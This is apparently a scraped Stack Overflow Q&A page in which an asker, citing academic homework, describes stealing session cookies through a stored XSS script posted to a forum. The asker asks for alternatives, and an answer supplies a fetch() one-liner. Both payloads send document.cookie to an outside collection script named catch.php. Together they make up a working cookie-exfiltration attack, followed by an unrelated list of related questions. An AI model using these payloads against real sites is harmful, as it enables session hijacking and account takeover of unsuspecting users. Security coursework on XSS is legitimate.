'How to steal a cookie using XSS script?

I have an academic homework where I need to steal the session cookie.

Since the application has a forum page, I made a publication with the following code and the cookie is indeed stolen

<script>
window.location='http://www.dei.isep.ipp.pt/~jpl/catch.php?cookie='+document.cookie
</script>

catch.php is a script that stores the stolen information in a file and document.cookie is the parameter passed.

Is there any other way to store the stolen credentials like causing a GET request using an image?

javascriptcookiesxss


Solution 1:[1]

You can use fetch to send a request without changing the window location.

fetch("http://www.dei.isep.ipp.pt/~jpl/catch.php?cookie="+document.cookie);

Sources

This article follows the attribution requirements of Stack Overflow and is licensed under CC BY-SA 3.0.

Source: Stack Overflow

Solution Source
Solution 1 Posandu

Related Questions

React Router with optional path parameter

How to dynamically update google recaptcha sitekey?

How to dynamically update google recaptcha sitekey?

Remove duplicate in a string - javascript

Remove duplicate in a string - javascript

Searching a string for missing letters of the alphabet in javascript

Searching a string for missing letters of the alphabet in javascript

Searching a string for missing letters of the alphabet in javascript

Find an element in DOM based on an attribute value

Redirecting html page with javascript

Find an element in DOM based on an attribute value

Find an element in DOM based on an attribute value

Redirecting html page with javascript

How to find x and y coordinates of a button while using keyboard navigation?

How to find x and y coordinates of a button while using keyboard navigation?